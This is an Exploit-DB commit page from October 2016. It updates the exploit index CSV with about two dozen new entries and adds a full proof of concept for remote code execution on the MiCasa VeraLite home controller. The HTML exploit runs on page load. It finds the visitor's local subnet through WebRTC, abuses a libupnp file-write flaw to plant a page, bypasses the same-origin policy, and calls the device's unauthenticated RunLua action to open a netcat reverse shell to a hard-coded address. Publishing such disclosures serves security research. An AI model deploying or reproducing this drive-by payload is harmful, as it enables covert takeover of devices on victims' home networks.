DB: 2016-10-21

24 new exploits NetAuctionHelp 4.1 - search.asp SQL Injection Apple Mac OSX 10.4.11 2007-008 - i386_set_ldt System Call Local Arbitrary Code Execution Microsoft Edge - Array.map Heap Overflow (MS16-119) Microsoft Jet Database Engine - '.MDB' File Parsing Remote Buffer Overflow Microsoft Edge - Array.join Info Leak (MS16-119) Windows DeviceApi CMApi PiCMOpenDeviceKey - Arbitrary Registry Key Write Privilege Escalation (MS16-124) Windows DeviceApi CMApi - PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124) HikVision Security Systems - Activex Buffer Overflow Oracle Netbeans IDE 8.1 - Directory Traversal MiCasa VeraLite - Remote Code Execution Oracle BI Publisher 11.1.1.6.0 / 11.1.1.7.0 / 11.1.1.9.0 / 12.2.1.0.0 - XML External Entity Injection Classifieds Rental Script - SQL Injection SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service SAP Adaptive Server Enterprise 16 - Denial of Service Event Calendar PHP 1.5 - SQL Injection SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution SPIP 3.1.1 / 3.1.2 - File Enumeration / Path Traversal SPIP 3.1.2 - Cross-Site Request Forgery Windows win32k.sys - TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120) Windows win32k.sys - TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120) Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124) Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123) Microsoft Edge - Function.apply Info Leak (MS16-119) Microsoft Edge - Spread Operator Stack Overflow (MS16-119) Windows Edge/IE - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118) Windows Edge/IE - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118) Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124) Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit) OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)
wrglbr · Oct 21, 2016 · 07fdc77 · 07fdc77
1 parent 77b46b2
commit 07fdc77
Show file tree

Hide file tree

Showing 28 changed files with 3,550 additions and 78 deletions.
diff --git a/files.csv b/files.csv
@@ -27437,7 +27437,6 @@ id,file,description,date,author,platform,type,port
 30466,platforms/php/webapps/30466.txt,"File Uploader 1.1 - 'index.php' config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
 30467,platforms/php/webapps/30467.txt,"File Uploader 1.1 - datei.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
 30468,platforms/windows/local/30468.pl,"RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - '.rmp' Version Attribute Buffer Overflow",2013-12-24,"Gabor Seljan",windows,local,0
-30798,platforms/asp/webapps/30798.txt,"NetAuctionHelp 4.1 - search.asp SQL Injection",2007-11-22,"Aria-Security Team",asp,webapps,0
 30470,platforms/unix/remote/30470.rb,"Synology DiskStation Manager - SLICEUPLOAD Remote Command Execution (Metasploit)",2013-12-24,Metasploit,unix,remote,5000
 30471,platforms/linux/remote/30471.rb,"OpenSIS 'modname' - PHP Code Execution (Metasploit)",2013-12-24,Metasploit,linux,remote,80
 30472,platforms/linux/remote/30472.rb,"Zimbra Collaboration Server - Local File Inclusion (Metasploit)",2013-12-24,Metasploit,linux,remote,7071
@@ -27787,15 +27786,15 @@ id,file,description,date,author,platform,type,port
 30762,platforms/php/webapps/30762.txt,"WordPress Plugin WP-SlimStat 0.9.2 - Cross-Site Scripting",2007-11-13,"Fracesco Vaj",php,webapps,0
 30763,platforms/linux/dos/30763.php,"KDE Konqueror 3.5.6 - Cookie Handling Denial of Service",2007-11-14,"laurent gaffie",linux,dos,0
 30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 - Dialog.php Unauthorized Access",2007-11-14,d3hydr8,php,webapps,0
-30765,platforms/osx/local/30765.c,"Apple Mac OSX 10.4.11 2007-008 - i386_set_ldt System Call Local Arbitrary Code Execution",2007-11-14,"Mark Tull",osx,local,0
+40602,platforms/windows/dos/40602.html,"Microsoft Edge - Array.map Heap Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
 30766,platforms/linux/dos/30766.c,"GNU TAR 1.15.91 / CPIO 2.5.90 - safer_name_suffix Remote Denial of Service",2007-11-14,"Dmitry V. Levin",linux,dos,0
 30767,platforms/windows/dos/30767.html,"Apple Safari 3.0.x - for Windows Document.Location.Hash Buffer Overflow",2007-06-25,"Azizov E",windows,dos,0
 30768,platforms/multiple/remote/30768.txt,"IBM Websphere Application Server 5.1.1 - WebContainer HTTP Request Header Security",2007-11-15,anonymous,multiple,remote,0
 30769,platforms/php/webapps/30769.txt,"Nuked-klaN 1.7.5 - File Parameter News Module Cross-Site Scripting",2007-11-15,Bl@ckM@mba,php,webapps,0
 30770,platforms/cgi/webapps/30770.txt,"AIDA Web - Frame.HTML Multiple Unauthorized Access Vulnerabilities",2007-11-14,"MC Iglo",cgi,webapps,0
 30771,platforms/multiple/remote/30771.txt,"Aruba MC-800 Mobility Controller - Screens Directory HTML Injection",2007-11-15,"Jan Fry",multiple,remote,0
 30772,platforms/windows/remote/30772.html,"ComponentOne FlexGrid 7.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-15,"Elazar Broad",windows,remote,0
-30773,platforms/windows/dos/30773.txt,"Microsoft Jet Database Engine - '.MDB' File Parsing Remote Buffer Overflow",2007-11-16,cocoruder,windows,dos,0
+40604,platforms/windows/dos/40604.html,"Microsoft Edge - Array.join Info Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
 30774,platforms/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script - Cross-Site Scripting",2007-11-16,"Adrian Pastor",php,webapps,0
 30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injection",2007-11-17,"Aria-Security Team",asp,webapps,0
 30776,platforms/linux/dos/30776.txt,"LIVE555 Media Server 2007.11.1 - ParseRTSPRequestString Remote Denial Of Service",2007-11-19,"Luigi Auriemma",linux,dos,0
@@ -36679,10 +36678,11 @@ id,file,description,date,author,platform,type,port
 40570,platforms/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash PoC",2016-10-18,"Antonio Z.",osx,dos,0
 40571,platforms/cgi/webapps/40571.pl,"Cgiemail 1.6 - Source Code Disclosure",2016-10-18,"Finbar Crago",cgi,webapps,80
 40572,platforms/windows/local/40572.cs,"Windows DFS Client Driver - Arbitrary Drive Mapping Privilege Escalation (MS16-123)",2016-10-18,"Google Security Research",windows,local,0
-40573,platforms/windows/local/40573.cs,"Windows DeviceApi CMApi PiCMOpenDeviceKey - Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
+40573,platforms/windows/local/40573.cs,"Windows DeviceApi CMApi - PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
 40574,platforms/windows/local/40574.cs,"Windows DeviceApi CMApi - User Hive Impersonation Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
 40576,platforms/php/webapps/40576.py,"XhP CMS 0.5.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-19,"Ahsan Tahir",php,webapps,0
 40577,platforms/windows/local/40577.txt,"IObit Advanced SystemCare 10.0.2 - Unquoted Service Path Privilege Escalation",2016-10-19,Amir.ght,windows,local,0
+40578,platforms/windows/local/40578.py,"HikVision Security Systems - Activex Buffer Overflow",2016-10-19,"Yuriy Gurkin",windows,local,0
 40579,platforms/windows/local/40579.txt,"Intel(R) Management Engine Components 8.0.1.1399 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
 40580,platforms/windows/local/40580.txt,"Lenovo RapidBoot HDD Accelerator 1.00.0802 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
 40581,platforms/windows/local/40581.txt,"Lenovo Slim USB Keyboard 1.09 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
@@ -36692,3 +36692,24 @@ id,file,description,date,author,platform,type,port
 40584,platforms/php/webapps/40584.txt,"Intel(R) PROSet/Wireless WiFi Software 15.01.1000.0927 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",php,webapps,0
 40586,platforms/windows/local/40586.txt,"PDF Complete 4.1.12 Corporate Edition - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
 40587,platforms/windows/local/40587.txt,"Realtek High Definition Audio Driver 6.0.1.6730 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
+40588,platforms/multiple/local/40588.txt,"Oracle Netbeans IDE 8.1 - Directory Traversal",2016-10-20,hyp3rlinx,multiple,local,0
+40589,platforms/hardware/remote/40589.html,"MiCasa VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",hardware,remote,0
+40590,platforms/xml/webapps/40590.txt,"Oracle BI Publisher 11.1.1.6.0 / 11.1.1.7.0 / 11.1.1.9.0 / 12.2.1.0.0 - XML External Entity Injection",2016-10-20,"Jakub Palaczynski",xml,webapps,0
+40591,platforms/php/webapps/40591.txt,"Classifieds Rental Script - SQL Injection",2016-10-20,"Arbin Godar",php,webapps,0
+40592,platforms/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,windows,dos,0
+40593,platforms/windows/dos/40593.py,"SAP Adaptive Server Enterprise  16 - Denial of Service",2016-10-20,ERPScan,windows,dos,0
+40594,platforms/php/webapps/40594.txt,"Event Calendar PHP 1.5 - SQL Injection",2016-10-20,"Ehsan Hosseini",php,webapps,0
+40595,platforms/php/webapps/40595.txt,"SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution",2016-10-20,Sysdream,php,webapps,80
+40596,platforms/php/webapps/40596.txt,"SPIP 3.1.1 / 3.1.2 - File Enumeration / Path Traversal",2016-10-20,Sysdream,php,webapps,80
+40597,platforms/php/webapps/40597.txt,"SPIP 3.1.2 - Cross-Site Request Forgery",2016-10-20,Sysdream,php,webapps,80
+40598,platforms/windows/dos/40598.txt,"Windows win32k.sys - TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
+40599,platforms/windows/dos/40599.txt,"Windows win32k.sys - TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
+40600,platforms/windows/dos/40600.txt,"Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)",2016-10-20,"Google Security Research",windows,dos,0
+40601,platforms/windows/dos/40601.txt,"Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)",2016-10-20,"Google Security Research",windows,dos,0
+40603,platforms/windows/dos/40603.html,"Microsoft Edge - Function.apply Info Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
+40605,platforms/windows/dos/40605.html,"Microsoft Edge - Spread Operator Stack Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
+40606,platforms/windows/local/40606.cpp,"Windows Edge/IE - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
+40607,platforms/windows/local/40607.cpp,"Windows Edge/IE - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
+40608,platforms/windows/local/40608.cs,"Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
+40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471
+40610,platforms/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099
diff --git a/platforms/asp/webapps/30798.txt b/platforms/asp/webapps/30798.txt
diff --git a/platforms/hardware/remote/40589.html b/platforms/hardware/remote/40589.html
@@ -0,0 +1,156 @@
+# Exploit Title: MiCasa VeraLite Remote Code Execution
+# Date: 10-20-2016
+# Software Link: http://getvera.com/controllers/veralite/
+# Exploit Author: Jacob Baines
+# Contact: https://twitter.com/Junior_Baines
+# CVE: CVE-2013-4863 & CVE-2016-6255
+# Platform: Hardware
+
+1. Description
+
+A remote attacker can execute code on the MiCasa VeraLite if someone on the same LAN as the VeraLite visits a crafted webpage.
+
+2. Proof of Concept
+
+<!--
+    @about
+    This file, when loaded in a browser, will attempt to get a reverse shell
+    on a VeraLite device on the client's network. This is achieved with the
+    following steps:
+
+    1. Acquire the client's internal IP address using webrtc. We then assume the
+       client is operating on a \24 network.
+    2. POST :49451/z3n.html to every address on the subnet. This leverages two
+       things we know to be true about VeraLite:
+           - there should be a UPnP HTTP server on 49451
+           - VeraLite uses a libupnp vulnerable to CVE-2016-6255.
+    3. Attempt to load :49451/z3n.html in an iframe. This will exist if step 2
+       successfully created the file via CVE-2016-6255
+    4. z3n.html will allow us to bypass same origin policy and it will make a
+       POST request that executes RunLau. This also leverages information we
+       know to be true about Veralite:
+           - the control URL for HomeAutomationGateway is /upnp/control/hag
+           - no auth required
+    5. Our RunLua code executes a reverse shell to 192.168.217:1270.
+
+    @note
+    This code doesn't run fast in Firefox. This appears to largely be a performance
+    issue associated with attaching a lot of iframes to a page. Give the shell
+    popping a couple of minutes. In Chrome, it runs pretty fast but might
+    exhaust socket usage.
+
+    @citations
+    - WebRTC IP leak: https://github.com/diafygi/webrtc-ips
+    - Orignal RunLua Disclosure: https://media.blackhat.com/us-13/US-13-Crowley-Home-Invasion-2-0-WP.pdf
+    - CVE-2016-6255: http://seclists.org/oss-sec/2016/q3/102
+-->
+<!DOCTYPE html>
+<html>
+    <head>
+        <meta charset="UTF-8">
+        <script>
+            /**
+             * POSTS a page to ip:49451/z3n.html. If the target is a vulnerable
+             * libupnp then the page will be written. Once the request has
+             * completed, we attempt to load it in an iframe in order to bypass
+             * same origin policy. If the page is loaded into the iframe then
+             * it will make a soap action request with the action RunLua. The 
+             * Lua code will execute a reverse shell.
+             * @param ip the ip address to request to
+             * @param frame_id the id of the iframe to create
+             */
+            function create_page(ip, frame_id)
+            {
+                payload = "<!DOCTYPE html>\n" +
+                          "<html>\n" +
+                            "<head>\n" +
+                                "<title>Try To See It Once My Way</title>\n" +
+                                "<script>\n" +
+                                    "function exec_lua() {\n" +
+                                        "soap_request = \"<s:Envelope s:encodingStyle=\\\"http://schemas.xmlsoap.org/soap/encoding/\\\" xmlns:s=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\">\";\n" +
+                                        "soap_request += \"<s:Body>\";\n" +
+                                        "soap_request += \"<u:RunLua xmlns:u=\\\"urn:schemas-micasaverde-org:service:HomeAutomationGateway:1\\\">\";\n" +
+                                        "soap_request += \"<Code>os.execute("/bin/sh -c &apos;(mkfifo /tmp/a; cat /tmp/a | /bin/sh -i 2>&1 | nc 192.168.1.217 1270 > /tmp/a)&&apos;")</Code>\";\n" +
+                                        "soap_request += \"</u:RunLua>\";\n" +
+                                        "soap_request += \"</s:Body>\";\n" +
+                                        "soap_request += \"</s:Envelope>\";\n" +
+
+                                        "xhttp = new XMLHttpRequest();\n" +
+                                        "xhttp.open(\"POST\", \"upnp/control/hag\", true);\n" +
+                                        "xhttp.setRequestHeader(\"MIME-Version\", \"1.0\");\n" +
+                                        "xhttp.setRequestHeader(\"Content-type\", \"text/xml;charset=\\\"utf-8\\\"\");\n" +
+                                        "xhttp.setRequestHeader(\"Soapaction\", \"\\\"urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua\\\"\");\n" +
+                                        "xhttp.send(soap_request);\n" +
+                                    "}\n" +
+                                "</scr\ipt>\n" +
+                            "</head>\n" +
+                            "<body onload=\"exec_lua()\">\n" +
+                            "Zen?\n" +
+                            "</body>\n" +
+                          "</html>";
+
+                var xhttp = new XMLHttpRequest();
+                xhttp.open("POST", "http://" + ip  + ":49451/z3n.html", true);
+                xhttp.timeout = 1000;
+                xhttp.onreadystatechange = function()
+                {
+                    if (xhttp.readyState == XMLHttpRequest.DONE)
+                    {
+                        new_iframe = document.createElement('iframe');
+                        new_iframe.setAttribute("src", "http://" + ip + ":49451/z3n.html");
+                        new_iframe.setAttribute("id", frame_id);
+                        new_iframe.setAttribute("style", "width:0; height:0; border:0; border:none");
+                        document.body.appendChild(new_iframe);
+                    }
+                };
+                xhttp.send(payload);
+            }
+
+            /**
+             * This function abuses the webrtc internal IP leak. This function
+             * will find the the upper three bytes of network address and simply
+             * assume that the client is on a \24 network.
+             *
+             * Once we have an ip range, we will attempt to create a page on a
+             * vulnerable libupnp server via create_page().
+             */
+            function spray_and_pray()
+            {
+                RTCPeerConnection = window.RTCPeerConnection ||
+                                    window.mozRTCPeerConnection ||
+                                    window.webkitRTCPeerConnection;
+
+                peerConn = new RTCPeerConnection({iceServers:[]});
+                noop = function() { };
+
+                peerConn.createDataChannel("");
+                peerConn.createOffer(peerConn.setLocalDescription.bind(peerConn), noop);
+                peerConn.onicecandidate = function(ice)
+                {
+                    if (!ice || !ice.candidate || !ice.candidate.candidate)
+                    {
+                        return;
+                    }
+
+                    clientNetwork = /([0-9]{1,3}(\.[0-9]{1,3}){2})/.exec(ice.candidate.candidate)[1];
+                    peerConn.onicecandidate = noop;
+
+                    if (clientNetwork && clientNetwork.length > 0)
+                    {
+                        for (i = 0; i < 255; i++)
+                        {
+                            create_page(clientNetwork + '.' + i, "page"+i);
+                        }
+                    }
+                };
+            }
+        </script>
+    </head>
+    <body onload="spray_and_pray()">
+    Everything zen.
+    </body>
+</html>
+
+3. Solution:
+
+No solution exists